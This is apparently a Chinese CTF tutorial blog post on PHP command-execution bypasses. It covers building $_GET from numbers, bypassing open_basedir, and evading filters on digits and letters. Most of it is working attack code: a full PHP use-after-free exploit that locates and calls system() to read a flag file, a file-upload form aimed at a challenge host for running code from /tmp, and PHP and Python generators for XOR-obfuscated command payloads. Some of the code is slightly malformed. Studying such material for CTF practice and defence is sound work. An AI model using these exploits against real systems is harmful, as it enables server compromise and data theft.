Web1 命令执行（四）

Ing ing～

已于 2022-02-09 19:39:32 修改

阅读量6.6k

点赞数

文章标签：蓝桥杯职场和发展

于 2022-02-08 21:31:32 首次发布

本文链接：https://blog.csdn.net/weixin_53896576/article/details/122831047

版权

10.以数字和不敏感函数构造敏感函数

base_convert(1231231131,10,36) ===>hex2bin
hex2bin(dechex(1598506324))=======>_GET
$hex2bin(dechex(1598506324))=======>$_GET

(1)base_convert() 函数：在任意进制之间转换数字。

语法：base_convert(number,frombase,tobase)

参数	描述
number	必需。原始值。
frombase	必需。数字原来的进制。
tobase	必需。要转换的进制。

说明:返回一个字符串，包含 number 以 tobase 进制的表示。number 本身的进制由 frombase 指定。frombase 和 tobase 都只能在 2 和 36 之间（包括 2 和 36）。高于十进制的数字用字母 a-z 表示，例如 a 表示 10，b 表示 11 以及 z 表示 35。

(2) hex2bin函数：把十六进制值的字符串转换为 ASCII 字符。

语法:hex2bin(string)

参数	描述
string	必需。要转换的十六进制值。

（3）dechex() 函数：把十进制数转换为十六进制数。

语法：dechex（number）

11.open_basedir()绕过

open_basedir: 将用户可操作的文件限制在某目录下

传脚本绕过

<?php
function ctfshow($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
if(!isset($backtrace[1]['args'])) {
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j])
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= sprintf("%c",($ptr & 0xff));
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = sprintf("%c",($v & 0xff));
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) {
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) {
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf；
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) {
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) {
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA');

$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
write($abc, 0x60, 2);
write($abc, 0x70, 6);
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);
($helper->b)($cmd);
exit();
}
ctfshow("cat /flag0.txt");ob_end_flush();
?>

直接把脚本当作参数传⼊，最后⼀⾏是执⾏的命令

ini_set('open_basedir','/');
系统命令不受open_basedir的限制

<?php
ini_set('open_basedir','/var/www/html');
$a = eval(system('tac /flag.txt')); //仍然可以执行
?>

⼀些其他伪协议不受 open_basedir 的限制==>⽂件包含讲解

12.无数字字符绕过

（1）构造POST数据包

通过构造数据包，向⽬标服务器发送⽂件，⽂件已被保存到tmp⽬录下再根据保存的⽂件名的特性(最后⼀个字⺟为⼤写)，筛选⽂件，利⽤ . 执⾏。

解题思路:(1)构造post数据包上传文件，linux系统下会保存在/tmp/php？？？？？？

（2)抓包，使文件中包含sh'命令（sh命令是shell命令语言解释器，执行命令从标准输入读取或从一个文件中读取。通过用户输入命令，和内核进行沟通！）

（3）利用 . 执行

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/"
method="post" enctype="multipart/form-data">

<!--链接是当前打开的题目链接-->
<label for="file">文件名：</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>

注意：tmp目录下文件比较多，我们所上传的文件最后一个字母是大写，因此利用ascii字母的大写匹配，过滤掉其他文件[@-[]。

（2）无数字字母绕过正则

通过汉字或者⼀些不可⻅字符，进⾏异或，求与，取反等操作构建字⺟从⽽构建命令，最后显示的结果是经过url编码的。

脚本的说明：

生成字符表脚本

<?php
/*author yu22x*/
$myfile = fopen("xor_rce.txt", "w"); //以写的方式打开txt文件
$contents="";
for ($i=0; $i < 256; $i++) { //ascii码只占一个字节，所以设置最大数256
//两个for循环总共256*256中可能的情况
for ($j=0; $j <256 ; $j++) { //通过i，j来构造字母
if($i<16){ //ascii的前16个字符的十六进制应该是01，02，。。。。下面为了格式化
数字加上了0

$hex_i='0'.dechex($i); //dechex(十进制转换成十六进制)
}
else{
$hex_i=dechex($i); ///将所有的数字转换成十六进制
}
if($j<16){
$hex_j='0'.dechex($j);
}
else{
$hex_j=dechex($j);
}
$preg = '/[a-z0-9]/i'; //根据题目给的正则表达式修改即可
if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($he
x_j))){//过滤掉被匹配的字符
echo "";
}
else{
$a='%'.$hex_i;
$b='%'.$hex_j;
$c=(urldecode($a)^urldecode($b));
if (ord($c)>=32&ord($c)<=126) { //32到126是ascii码的所有可显示字符
$contents=$contents.$c." ".$a." ".$b."\n";
}
}
}
}
fwrite($myfile,$contents); ///将我们得到的所有字符写入之前打开的文件
fclose($myfile);//关闭文件

利用字符表生成我们需要的命令

# -*- coding: utf-8 -*-
# author yu22x
import requests
import urllib
from sys import *
import os
def action(arg): //定义action函数
s1="" //用于异或的第一个字符串
s2="" //用于异或的第二个字符串
for i in arg: //i表示arg的一个字符
f=open("xor_rce.txt","r") //打开php脚本生成的xor_rce.txt
while True:
t=f.readline() //一行一行读取文件
if t=="": //读取完毕就结束
break
if t[0]==i: //t[0]也就是文件中的第一列，32-126个可显示的ascii码字符
#print(i)
s1+=t[2:5] //截取i所在行第3列到第5列表示第一个字符串
s2+=t[6:9] ///截取i所在行第7列到第9列表示第二个字符串
break
f.close()
output="(\""+s1+"\"^\""+s2+"\")" ///对两个字符串进行异或
return(output)
while True:
//我们输入的函数和命令被作为arg
param=action(input("\n[+] your function：") )+action(input("[+] your comma
nd："))+";"

print(param)